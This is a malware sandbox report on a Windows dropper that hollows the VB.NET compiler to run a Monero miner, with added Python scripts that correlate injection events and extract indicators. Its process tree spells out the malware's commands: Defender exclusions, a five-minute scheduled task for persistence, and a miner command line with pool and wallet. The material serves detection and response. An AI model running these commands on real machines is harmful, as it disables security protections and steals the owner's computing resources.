Analysis
- max time kernel: 172s
- max time network: 184s
- platform: windows10-2004_x64
- resource: win10v2004-20221111-en
- resource tags: arch:x64, arch:x86, image:win10v2004-20221111-en, locale:en-us, os:windows10-2004-x64, system
- submitted: 29-11-2022 10:53
- static task: static1
General
- Target: 060dcf3db41635a2f995e0ed15ddf9ffab0e3d462b15b91cd7b4626ca2f0a178.exe
- Size: 1.9MB
- MD5: c9997fc1a83d922ad052768f2b34957b
- SHA1: 8c5a6283fd2fd20ed7309728a572331c4a5c2ae8
- SHA256: 060dcf3db41635a2f995e0ed15ddf9ffab0e3d462b15b91cd7b4626ca2f0a178
- SHA512: 1f73c858c30ddc9199b61351a3827c651ae812e6cba6255a5c3362206157142361a84d2571bb4dd327f01ea70348a88a2e1e4c9d73ad80a7ffed4f97d7e7aeb6
- SSDEEP: 49152:j2d8gd1orIde6fk6TwHdPtBqYiV6fFKCzYSHhdMe2hVq2RWrsgzfr8:j2Wgd1orIdeWk6odPXqY3tDlMe2ho2RE
Malware Config
No configuration was extracted by the sandbox. The mining configuration is nonetheless visible in clear text on the vbc.exe command line in the Processes section (pool, port, wallet, TLS flag, coin).
Signatures
- XMRig Miner payload (6 IoCs)
  YARA rule xmrig matched in the memory of PID 4328 (vbc.exe):
    behavioral1/memory/4328-195-0x0000000140343234-mapping.dmp
    behavioral1/memory/4328-194-0x0000000140000000-0x00000001407C9000-memory.dmp
    behavioral1/memory/4328-196-0x0000000140000000-0x00000001407C9000-memory.dmp
    behavioral1/memory/4328-197-0x0000000140000000-0x00000001407C9000-memory.dmp
    behavioral1/memory/4328-199-0x0000000140000000-0x00000001407C9000-memory.dmp
    behavioral1/memory/4328-203-0x0000000140000000-0x00000001407C9000-memory.dmp
  All hits sit in one 7.8MB region at 0x140000000, the default image base of a 64-bit PE, inside a process whose on-disk image is the VB.NET compiler. The rule matched nothing on disk: the miner exists only in memory, after PWOJ.exe writes it into vbc.exe (see the SetThreadContext and WriteProcessMemory entries below).
- Executes dropped EXE (1 IoC)
  PID 3132 PWOJ.exe
- Checks computer location settings (2 TTPs, 1 IoC)
  Looks up the country code configured in the registry, possibly for geofencing.
  PWOJ.exe (PID 3132) queried key value \REGISTRY\USER\S-1-5-21-2386679933-1492765628-3466841596-1000\Control Panel\International\Geo\Nation
  Caveat: this value is also read during ordinary locale initialization (for example by .NET RegionInfo), so the read on its own is weak evidence, and nothing in this report shows behaviour branching on the result.
- Uses the VB.NET compiler (vbc.exe) for execution (1 TTP)
  The signature name says "VBS compiler", but vbc.exe under C:\Windows\Microsoft.NET\Framework64\v4.0.30319 is the Visual Basic .NET command-line compiler, not a VBScript engine. It compiles nothing here: it is the Microsoft-shipped host process into which PWOJ.exe writes the miner, which is why the mining command line appears under vbc.exe in the process tree.
- Suspicious use of SetThreadContext (1 IoC)
  PID 3132 (PWOJ.exe) set the thread context of PID 4328 (vbc.exe).
  Together with the 14 WriteProcessMemory calls from 3132 into 4328 and the xmrig YARA hits at 0x140000000 inside 4328, this is consistent with process hollowing: a legitimate binary is started, its memory is overwritten with the payload and the initial thread is pointed at the new code.
- Enumerates physical storage devices (1 TTP)
  Attempts to interact with connected storage/optical drive(s). The sandbox's stock description calls this "likely ransomware behaviour"; for this sample the payload is a miner and the report records no file encryption, so treat it as generic system enumeration.
- Creates scheduled task(s) (1 TTP, 1 IoC)
  Schtasks is often used by malware for persistence or to perform post-infection execution.
  Here PID 1604 creates the task "PWOJ" (/sc MINUTE /mo 5 /RL HIGHEST /f) running C:\ProgramData\netcore\PWOJ.exe. The five-minute trigger relaunches PWOJ.exe, and with it the miner, whenever it is killed; the task name and the netcore directory are the durable host indicators.
- Delays execution with timeout.exe (1 IoC)
  PID 4460: timeout 3
  Run from tmpAED.tmp.bat, which waits three seconds and then starts the dropped copy C:\ProgramData\netcore\PWOJ.exe. That copy carries the same hashes as the submitted file, so the sample re-executes itself from a directory it has just excluded from Defender.
- Suspicious behavior: EnumeratesProcesses (14 IoCs)
  2344 (submitted sample) x2, 2568 powershell.exe x2, 2600 powershell.exe x2, 3132 PWOJ.exe x4, 3740 powershell.exe x2, 2064 powershell.exe x2
- Suspicious behavior: LoadsDriver (1 IoC)
  PID 660 (image name not recorded in the report)
- Suspicious use of AdjustPrivilegeToken (8 IoCs)
  SeDebugPrivilege: 2344 (submitted sample), 2568 powershell.exe, 2600 powershell.exe, 3132 PWOJ.exe, 3740 powershell.exe, 2064 powershell.exe
  SeLockMemoryPrivilege: 4328 vbc.exe (x2)
  SeLockMemoryPrivilege is the privilege XMRig enables to back RandomX with large pages. A compiler process asking for it is a strong hunting signal on its own, independent of the YARA match.
- Suspicious use of FindShellTrayWindow (1 IoC)
  PID 4328 vbc.exe
- Suspicious use of WriteProcessMemory (32 IoCs)
  Parent -> child write counts as recorded (every ordinary spawn in this run shows exactly two):
    2344 (submitted sample) -> 2600 powershell.exe: 2
    2344 (submitted sample) -> 2568 powershell.exe: 2
    2344 (submitted sample) -> 116 cmd.exe: 2
    116 cmd.exe -> 4460 timeout.exe: 2
    116 cmd.exe -> 3132 PWOJ.exe: 2
    3132 PWOJ.exe -> 2064 powershell.exe: 2
    3132 PWOJ.exe -> 3740 powershell.exe: 2
    3132 PWOJ.exe -> 3448 cmd.exe: 2
    3448 cmd.exe -> 1604 schtasks.exe: 2
    3132 PWOJ.exe -> 4328 vbc.exe: 14
  The 14 writes into vbc.exe are the payload being copied in; with the SetThreadContext entry above they single out 3132 -> 4328 as the injection, while every other pair is a plain CreateProcess.
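The pair-by-pair reasoning above can be automated. The following is an added example for this report, not sandbox code: it parses event rows written in the report's own wording (SetThreadContext, WriteProcessMemory and AdjustPrivilegeToken) and scores each parent/child pair. EVENTS is constructed from the rows above, with the fourteen PWOJ.exe -> vbc.exe writes reproduced by list multiplication; the host-binary list and the score weights are this example's assumptions, not something the report defines.

```python
"""Correlate sandbox event rows into one injection verdict per (parent, child) pair.

Added example for this report, not sandbox code. EVENTS is constructed from the
Signatures section above using the report's own row wording.
"""
import re
from collections import defaultdict
from typing import Dict, List

SAMPLE = "060dcf3db41635a2f995e0ed15ddf9ffab0e3d462b15b91cd7b4626ca2f0a178.exe"


def _spawn(src: int, src_img: str, dst: int, dst_img: str) -> List[str]:
    """The two WriteProcessMemory rows every ordinary child spawn produced in this run."""
    return [f"PID {src} wrote to memory of {dst} {src} {src_img} {dst_img}"] * 2


EVENTS: List[str] = (
    _spawn(2344, SAMPLE, 2600, "powershell.exe")
    + _spawn(2344, SAMPLE, 2568, "powershell.exe")
    + _spawn(2344, SAMPLE, 116, "cmd.exe")
    + _spawn(116, "cmd.exe", 4460, "timeout.exe")
    + _spawn(116, "cmd.exe", 3132, "PWOJ.exe")
    + _spawn(3132, "PWOJ.exe", 2064, "powershell.exe")
    + _spawn(3132, "PWOJ.exe", 3740, "powershell.exe")
    + _spawn(3132, "PWOJ.exe", 3448, "cmd.exe")
    + _spawn(3448, "cmd.exe", 1604, "schtasks.exe")
    + ["PID 3132 set thread context of 4328 3132 PWOJ.exe vbc.exe"]
    + ["PID 3132 wrote to memory of 4328 3132 PWOJ.exe vbc.exe"] * 14
    + [f"Token: SeDebugPrivilege {pid} {img}" for pid, img in
       [(2344, SAMPLE), (2568, "powershell.exe"), (2600, "powershell.exe"),
        (3132, "PWOJ.exe"), (3740, "powershell.exe"), (2064, "powershell.exe")]]
    + ["Token: SeLockMemoryPrivilege 4328 vbc.exe"] * 2
)

EVENT_RE = re.compile(r"^PID (\d+) (set thread context of|wrote to memory of) (\d+) \d+ (\S+) (\S+)$")
TOKEN_RE = re.compile(r"^Token: (\w+) (\d+) (\S+)$")

# Microsoft binaries that .NET loaders routinely hollow (assumed list; extend as needed).
COMMON_HOSTS = {"vbc.exe", "csc.exe", "msbuild.exe", "regasm.exe", "regsvcs.exe",
                "installutil.exe", "aspnet_compiler.exe", "applaunch.exe"}


def correlate(events: List[str]) -> List[Dict[str, object]]:
    """Score every (parent, child) pair; highest score first."""
    pairs: Dict[tuple, Dict[str, int]] = defaultdict(lambda: {"writes": 0, "set_thread_context": 0})
    privileges: Dict[int, set] = defaultdict(set)
    for line in events:
        m = EVENT_RE.match(line)
        if m:
            src, action, dst, src_img, dst_img = m.groups()
            key = (int(src), src_img, int(dst), dst_img)
            pairs[key]["writes" if action.startswith("wrote") else "set_thread_context"] += 1
            continue
        t = TOKEN_RE.match(line)
        if t:
            privileges[int(t.group(2))].add(t.group(1))

    verdicts = []
    for (src, src_img, dst, dst_img), counts in pairs.items():
        score, reasons = 0, []
        if counts["set_thread_context"]:
            score += 3
            reasons.append("parent rewrote the child's thread context")
        if counts["writes"] > 2:                       # plain spawns in this run show exactly 2
            score += 2
            reasons.append(f"{counts['writes']} WriteProcessMemory calls")
        if dst_img.lower() in COMMON_HOSTS:
            score += 1
            reasons.append("child is a commonly hollowed Microsoft host binary")
        if "SeLockMemoryPrivilege" in privileges.get(dst, set()):
            score += 2                                 # XMRig enables it for large pages
            reasons.append("child enabled SeLockMemoryPrivilege")
        verdicts.append({
            "source": src, "source_image": src_img, "target": dst, "target_image": dst_img,
            "writes": counts["writes"], "set_thread_context": counts["set_thread_context"],
            "score": score, "reasons": reasons,
            "verdict": "hollowing_candidate" if score >= 5 else "normal_spawn",
        })
    return sorted(verdicts, key=lambda v: -v["score"])


if __name__ == "__main__":
    for v in correlate(EVENTS):
        print(v["verdict"], v["source_image"], "->", v["target_image"], v["reasons"])
```

The threshold of 5 means SetThreadContext plus any one other signal is enough; a pair showing only an unusual write count, or only a host binary from the list, stays below it, which keeps ordinary CreateProcess noise out of the result.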
Processes
- [PID 2344] C:\Users\Admin\AppData\Local\Temp\060dcf3db41635a2f995e0ed15ddf9ffab0e3d462b15b91cd7b4626ca2f0a178.exe
  cmdline: "C:\Users\Admin\AppData\Local\Temp\060dcf3db41635a2f995e0ed15ddf9ffab0e3d462b15b91cd7b4626ca2f0a178.exe"
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  - [PID 2600 or 2568] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\ProgramData'
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
  - [PID 2568 or 2600] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming'
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
  - [PID 116] C:\Windows\system32\cmd.exe
    cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmpAED.tmp.bat""
    - Suspicious use of WriteProcessMemory
    - [PID 4460] C:\Windows\system32\timeout.exe
      cmdline: timeout 3
      - Delays execution with timeout.exe
    - [PID 3132] C:\ProgramData\netcore\PWOJ.exe
      cmdline: "C:\ProgramData\netcore\PWOJ.exe"
      - Executes dropped EXE
      - Checks computer location settings
      - Suspicious use of SetThreadContext
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of AdjustPrivilegeToken
      - Suspicious use of WriteProcessMemory
      - [PID 2064 or 3740] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\ProgramData'
        - Suspicious behavior: EnumeratesProcesses
        - Suspicious use of AdjustPrivilegeToken
      - [PID 3740 or 2064] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming'
        - Suspicious behavior: EnumeratesProcesses
        - Suspicious use of AdjustPrivilegeToken
      - [PID 3448] C:\Windows\System32\cmd.exe
        cmdline: "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc MINUTE /mo 5 /RL HIGHEST /tn "PWOJ" /tr "C:\ProgramData\netcore\PWOJ.exe"
        - Suspicious use of WriteProcessMemory
        - [PID 1604] C:\Windows\system32\schtasks.exe
          cmdline: schtasks /create /f /sc MINUTE /mo 5 /RL HIGHEST /tn "PWOJ" /tr "C:\ProgramData\netcore\PWOJ.exe"
          - Creates scheduled task(s)
      - [PID 4328] C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe
        cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe -o xmr-eu1.nanopool.org:14433 -u 4BrL51JCc9NGQ71kWhnYoDRffsDZy7m1HUU7MRU4nUMXAHNFBEJhkTZV9HdaL4gfuNBxLPc3BeMkLGaPbF5vWtANQoBJqYKAGMEQrLE8L8 --tls --coin monero
        - Suspicious use of AdjustPrivilegeToken
        - Suspicious use of FindShellTrayWindow
  PIDs are taken from the Signatures section; the report does not say which of each powershell.exe pair ran first, so those are given as pairs. The Defender exclusions are added twice (once by the original, once by the dropped copy), and the mining options are passed on the command line of a process whose image is the VB.NET compiler.
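The indicators a responder wants from this tree (Defender exclusion paths, the scheduled task's name, trigger and action, and the pool, port and wallet from the miner command line) can be pulled out mechanically. The following is an added example for this report, not the sandbox's code: PROCESS_ROWS is constructed from the command lines above, with the PIDs on the two powershell.exe pairs illustrative because the report does not order them. It goes slightly beyond this sample by also accepting Set-MpPreference, -ExclusionProcess/-ExclusionExtension, and the --url/--user and key=value spellings of the miner options.

```python
"""Extract the evasion, persistence and mining IOCs from the process tree above.

Added example for this report, not sandbox code. PROCESS_ROWS is constructed
from the command lines in the Processes section.
"""
import re
from typing import Dict, List, Optional, Tuple

SAMPLE = r"C:\Users\Admin\AppData\Local\Temp\060dcf3db41635a2f995e0ed15ddf9ffab0e3d462b15b91cd7b4626ca2f0a178.exe"
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
SCHTASKS = r'schtasks /create /f /sc MINUTE /mo 5 /RL HIGHEST /tn "PWOJ" /tr "C:\ProgramData\netcore\PWOJ.exe"'


def ps_exclusion(path: str) -> str:
    """The PowerShell command line the sample ran for each Defender exclusion."""
    return "\"powershell\" -Command Add-MpPreference -ExclusionPath '" + path + "'"


# (pid, image path, command line), constructed from the report's process tree
PROCESS_ROWS: List[Tuple[int, str, str]] = [
    (2344, SAMPLE, '"' + SAMPLE + '"'),
    (2600, PS, ps_exclusion(r"C:\ProgramData")),
    (2568, PS, ps_exclusion(r"C:\Users\Admin\AppData\Roaming")),
    (116, r"C:\Windows\system32\cmd.exe", r'C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmpAED.tmp.bat""'),
    (4460, r"C:\Windows\system32\timeout.exe", "timeout 3"),
    (3132, r"C:\ProgramData\netcore\PWOJ.exe", r'"C:\ProgramData\netcore\PWOJ.exe"'),
    (2064, PS, ps_exclusion(r"C:\ProgramData")),
    (3740, PS, ps_exclusion(r"C:\Users\Admin\AppData\Roaming")),
    (3448, r"C:\Windows\System32\cmd.exe", r'"C:\Windows\System32\cmd.exe" /c ' + SCHTASKS),
    (1604, r"C:\Windows\system32\schtasks.exe", SCHTASKS),
    (4328, r"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe",
     r"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe -o xmr-eu1.nanopool.org:14433 "
     r"-u 4BrL51JCc9NGQ71kWhnYoDRffsDZy7m1HUU7MRU4nUMXAHNFBEJhkTZV9HdaL4gfuNBxLPc3BeMkLGaPbF5vWtANQoBJqYKAGMEQrLE8L8 "
     r"--tls --coin monero"),
]

MP_CMDLET_RE = re.compile(r"\b(?:Add|Set)-MpPreference\b", re.IGNORECASE)
MP_EXCLUSION_RE = re.compile(
    r"-(Exclusion(?:Path|Process|Extension))\s+(?:'([^']+)'|\"([^\"]+)\"|(\S+))", re.IGNORECASE)
MINER_VALUE_OPTS = {"-o": "pool", "--url": "pool", "-u": "wallet", "--user": "wallet", "--coin": "coin"}
MINER_FLAG_OPTS = {"--tls": "tls", "-k": "keepalive", "--keepalive": "keepalive"}


def _basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def find_defender_exclusions(rows) -> List[Tuple[int, str, str]]:
    """(pid, parameter, value) for every Add-/Set-MpPreference -Exclusion* argument."""
    found = []
    for pid, _image, cmdline in rows:
        if MP_CMDLET_RE.search(cmdline):
            for m in MP_EXCLUSION_RE.finditer(cmdline):
                found.append((pid, m.group(1), m.group(2) or m.group(3) or m.group(4)))
    return found


def _opt(cmdline: str, flag: str) -> Optional[str]:
    """Value following a schtasks flag, with surrounding double quotes removed."""
    m = re.search(re.escape(flag) + r"\s+(?:\"([^\"]*)\"|(\S+))", cmdline, re.IGNORECASE)
    return None if m is None else (m.group(1) if m.group(1) is not None else m.group(2))


def find_scheduled_tasks(rows) -> List[Dict[str, object]]:
    """Tasks created by schtasks.exe itself; the cmd.exe /c wrapper carrying the same text is skipped."""
    tasks = []
    for pid, image, cmdline in rows:
        if _basename(image) != "schtasks.exe" or not re.search(r"/create\b", cmdline, re.IGNORECASE):
            continue
        modifier = _opt(cmdline, "/mo")
        tasks.append({
            "pid": pid, "name": _opt(cmdline, "/tn"), "action": _opt(cmdline, "/tr"),
            "schedule": (_opt(cmdline, "/sc") or "").upper(),
            "modifier": int(modifier) if modifier and modifier.isdigit() else None,
            "run_level": (_opt(cmdline, "/rl") or "").upper(),
        })
    return tasks


def parse_miner_cmdline(cmdline: str) -> Optional[Dict[str, object]]:
    """XMRig-style options -> dict, or None unless both a pool and a wallet are present."""
    tokens, info, i = cmdline.split(), {}, 0
    while i < len(tokens):
        key, eq, inline = tokens[i].partition("=")        # accept --url=host:port as well
        if key in MINER_VALUE_OPTS:
            info[MINER_VALUE_OPTS[key]] = inline if eq else (tokens[i + 1] if i + 1 < len(tokens) else "")
            i += 1 if eq else 2
            continue
        if tokens[i] in MINER_FLAG_OPTS:
            info[MINER_FLAG_OPTS[tokens[i]]] = True
        i += 1
    if "pool" not in info or "wallet" not in info:
        return None
    host, _, port = str(info["pool"]).rpartition("://")[2].rpartition(":")  # drop stratum+ssl:// etc.
    info["pool_host"] = host or str(info["pool"])
    info["pool_port"] = int(port) if port.isdigit() else None
    info.setdefault("tls", False)
    return info


def triage(rows) -> Dict[str, list]:
    miners = []
    for pid, image, cmdline in rows:
        info = parse_miner_cmdline(cmdline)
        if info is not None:
            info.update(pid=pid, host_image=_basename(image))
            miners.append(info)
    return {"defender_exclusions": find_defender_exclusions(rows),
            "scheduled_tasks": find_scheduled_tasks(rows), "miners": miners}
```

Matching scheduled tasks on the schtasks.exe image rather than on the text keeps the count at one, as in the report, instead of double-counting the cmd.exe wrapper; the same idea (key on the image that actually performs the action) applies when feeding Sysmon or EDR process-creation events into it.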
Network
No network rows were recorded in this run. The miner's configured endpoint is xmr-eu1.nanopool.org:14433 with --tls (from the vbc.exe command line), so pivot on that host and TLS port in proxy and DNS logs rather than on this empty section.
MITRE ATT&CK Matrix (ATT&CK v6)
The matrix body did not survive extraction; the per-signature TTP counts above are the only technique mapping left in this copy.
Downloads
- C:\ProgramData\netcore\PWOJ.exe (1.9MB; listed twice in the report)
  MD5 c9997fc1a83d922ad052768f2b34957b
  SHA1 8c5a6283fd2fd20ed7309728a572331c4a5c2ae8
  SHA256 060dcf3db41635a2f995e0ed15ddf9ffab0e3d462b15b91cd7b4626ca2f0a178
  SHA512 1f73c858c30ddc9199b61351a3827c651ae812e6cba6255a5c3362206157142361a84d2571bb4dd327f01ea70348a88a2e1e4c9d73ad80a7ffed4f97d7e7aeb6
  Every hash equals the submitted sample's: PWOJ.exe is a byte-for-byte self-copy, so blocking the original's hash also covers the persisted copy.
- C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log (2KB)
  MD5 d85ba6ff808d9e5444a4b369f5bc2730
  SHA1 31aa9d96590fff6981b315e0b391b575e4c0804a
  SHA256 84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f
  SHA512 8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249
- C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive (944B; listed twice in the report)
  MD5 6d3e9c29fe44e90aae6ed30ccf799ca8
  SHA1 c7974ef72264bbdf13a2793ccf1aed11bc565dce
  SHA256 2360634e63e8f0b5748e2c56ebb8f4aa78e71008ea7b5c9ca1c49be03b49557d
  SHA512 60c38c4367352537545d859f64b9c5cbada94240478d1d039fd27b5ecba4dc1c90051557c16d802269703b873546ead416279c0a80c6fd5e49ad361cef22596a
- C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive (944B; second version of the same file)
  MD5 98baf5117c4fcec1692067d200c58ab3
  SHA1 5b33a57b72141e7508b615e17fb621612cb8e390
  SHA256 30bf8496e9a08f4fdfe4767abcd565f92b6da06ca1c7823a70cb7cab16262e51
  SHA512 344a70bfc037d54176f12db91f05bf4295bb587a5062fd1febe6f52853571170bd8ef6042cb87b893185bbae1937cf77b679d7970f8cc1c2666b0b7c1b32987d
  The CLR usage log and the StartupProfileData files are PowerShell's own startup artefacts, written because the sample launched powershell.exe; they are not payload files.
- C:\Users\Admin\AppData\Local\Temp\tmpAED.tmp.bat (139B)
  MD5 84673b8e8b5f69c370ed28047d5bdc00
  SHA1 c18c5363816ed3b3cc0b2a74e1c1d8d661a8cfdd
  SHA256 71a31294d02b24f5d14dc275580c2dfc79af01056aa8071a93b1ead8fbbb8801
  SHA512 3170d8cdc21d79bee2095b11504f276b41886abca574aebed255cedafccb5682181a282d622c06cb037b71c383ad35ec1b015939851c8ba3cbcbddc3105fb0d5
  The batch file's contents are not captured in the report; the process tree shows it running timeout 3 and then C:\ProgramData\netcore\PWOJ.exe.
- memory/116-148-0x0000000000000000-mapping.dmp
- memory/1604-185-0x0000000000000000-mapping.dmp
- memory/2064-177-0x0000000000000000-mapping.dmp
- memory/2064-182-0x00007FF9F5AA0000-0x00007FF9F6561000-memory.dmp (10.8MB)
- memory/2344-142-0x00007FFA12CA0000-0x00007FFA12CCB000-memory.dmp (172KB)
- memory/2344-140-0x00007FFA14220000-0x00007FFA143C1000-memory.dmp (1.6MB)
- memory/2344-135-0x00007FFA14B10000-0x00007FFA14BAE000-memory.dmp (632KB)
- memory/2344-145-0x00007FF9F5D20000-0x00007FF9F67E1000-memory.dmp (10.8MB)
- memory/2344-149-0x0000000000790000-0x0000000000A6E000-memory.dmp (2.9MB)
- memory/2344-150-0x0000000000650000-0x0000000000693000-memory.dmp (268KB)
- memory/2344-151-0x00007FF9F5D20000-0x00007FF9F67E1000-memory.dmp (10.8MB)
- memory/2344-136-0x00007FFA10230000-0x00007FFA10242000-memory.dmp (72KB)
- memory/2344-144-0x00007FF9F4450000-0x00007FF9F459E000-memory.dmp (1.3MB)
- memory/2344-143-0x0000000000790000-0x0000000000A6E000-memory.dmp (2.9MB)
- memory/2344-139-0x0000000000650000-0x0000000000693000-memory.dmp (268KB)
- memory/2344-138-0x0000000000790000-0x0000000000A6E000-memory.dmp (2.9MB)
- memory/2344-137-0x00007FF9F5C60000-0x00007FF9F5D1D000-memory.dmp (756KB)
- memory/2344-134-0x00007FF9F67F0000-0x00007FF9F689A000-memory.dmp (680KB)
- memory/2344-141-0x00007FF9F5D20000-0x00007FF9F67E1000-memory.dmp (10.8MB)
- memory/2568-160-0x00007FF9F5D20000-0x00007FF9F67E1000-memory.dmp (10.8MB)
- memory/2568-156-0x00007FF9F5D20000-0x00007FF9F67E1000-memory.dmp (10.8MB)
- memory/2568-147-0x0000000000000000-mapping.dmp
- memory/2600-146-0x0000000000000000-mapping.dmp
- memory/2600-157-0x00007FF9F5D20000-0x00007FF9F67E1000-memory.dmp (10.8MB)
- memory/2600-155-0x00007FF9F5D20000-0x00007FF9F67E1000-memory.dmp (10.8MB)
- memory/2600-152-0x0000014E5FF30000-0x0000014E5FF52000-memory.dmp (136KB)
- memory/3132-172-0x0000000000980000-0x0000000000C5E000-memory.dmp (2.9MB)
- memory/3132-188-0x00007FF9F5AA0000-0x00007FF9F6561000-memory.dmp (10.8MB)
- memory/3132-174-0x00007FFA12CA0000-0x00007FFA12CCB000-memory.dmp (172KB)
- memory/3132-169-0x00007FF9F59E0000-0x00007FF9F5A9D000-memory.dmp (756KB)
- memory/3132-171-0x00007FF9F5AA0000-0x00007FF9F6561000-memory.dmp (10.8MB)
- memory/3132-173-0x0000000001600000-0x0000000001643000-memory.dmp (268KB)
- memory/3132-175-0x0000000000980000-0x0000000000C5E000-memory.dmp (2.9MB)
- memory/3132-176-0x00007FF9F5890000-0x00007FF9F59DE000-memory.dmp (1.3MB)
- memory/3132-168-0x00007FFA10230000-0x00007FFA10242000-memory.dmp (72KB)
- memory/3132-202-0x00007FF9F5AA0000-0x00007FF9F6561000-memory.dmp (10.8MB)
- memory/3132-179-0x00007FF9F5AA0000-0x00007FF9F6561000-memory.dmp (10.8MB)
- memory/3132-167-0x00007FFA14B10000-0x00007FFA14BAE000-memory.dmp (632KB)
- memory/3132-166-0x00007FF9F6570000-0x00007FF9F661A000-memory.dmp (680KB)
- memory/3132-161-0x0000000000000000-mapping.dmp
- memory/3132-201-0x0000000000980000-0x0000000000C5E000-memory.dmp (2.9MB)
- memory/3132-193-0x00007FFA116E0000-0x00007FFA1171B000-memory.dmp (236KB)
- memory/3132-192-0x00007FFA138D0000-0x00007FFA1393B000-memory.dmp (428KB)
- memory/3132-186-0x0000000001600000-0x0000000001643000-memory.dmp (268KB)
- memory/3132-187-0x0000000000980000-0x0000000000C5E000-memory.dmp (2.9MB)
- memory/3132-170-0x00007FFA14220000-0x00007FFA143C1000-memory.dmp (1.6MB)
- memory/3132-189-0x00007FFA12690000-0x00007FFA126B7000-memory.dmp (156KB)
- memory/3132-190-0x00007FF9F4490000-0x00007FF9F44C5000-memory.dmp (212KB)
- memory/3132-191-0x00007FF9F3630000-0x00007FF9F3732000-memory.dmp (1.0MB)
- memory/3448-184-0x0000000000000000-mapping.dmp
- memory/3740-183-0x00007FF9F5AA0000-0x00007FF9F6561000-memory.dmp (10.8MB)
- memory/3740-178-0x0000000000000000-mapping.dmp
- memory/4328-200-0x0000023154F80000-0x0000023154FC0000-memory.dmp (256KB)
- memory/4328-196-0x0000000140000000-0x00000001407C9000-memory.dmp (7.8MB)
- memory/4328-197-0x0000000140000000-0x00000001407C9000-memory.dmp (7.8MB)
- memory/4328-198-0x0000023154F30000-0x0000023154F50000-memory.dmp (128KB)
- memory/4328-199-0x0000000140000000-0x00000001407C9000-memory.dmp (7.8MB)
- memory/4328-194-0x0000000140000000-0x00000001407C9000-memory.dmp (7.8MB)
- memory/4328-195-0x0000000140343234-mapping.dmp
- memory/4328-203-0x0000000140000000-0x00000001407C9000-memory.dmp (7.8MB)
- memory/4328-204-0x0000023154FC0000-0x0000023154FE0000-memory.dmp (128KB)
- memory/4328-205-0x0000023154FE0000-0x0000023155000000-memory.dmp (128KB)
- memory/4328-206-0x0000023154FC0000-0x0000023154FE0000-memory.dmp (128KB)
- memory/4328-207-0x0000023154FE0000-0x0000023155000000-memory.dmp (128KB)
- memory/4460-154-0x0000000000000000-mapping.dmp
The 7.8MB region 0x140000000-0x1407C9000 in PID 4328 is the one the xmrig rule matched. 0x140000000 is the default image base of a 64-bit PE, so the miner sits at its preferred address, consistent with a manual map by PWOJ.exe rather than a loader-relocated module, and the 4328 mapping dump at 0x140343234 lies inside that region, where execution was redirected. Every other process in this run has its mapping dump at 0x0. Also note that PID 3132 (PWOJ.exe) repeats the 2.9MB and 268KB private regions seen in PID 2344 at different addresses, as expected for the same binary running a second time from C:\ProgramData\netcore.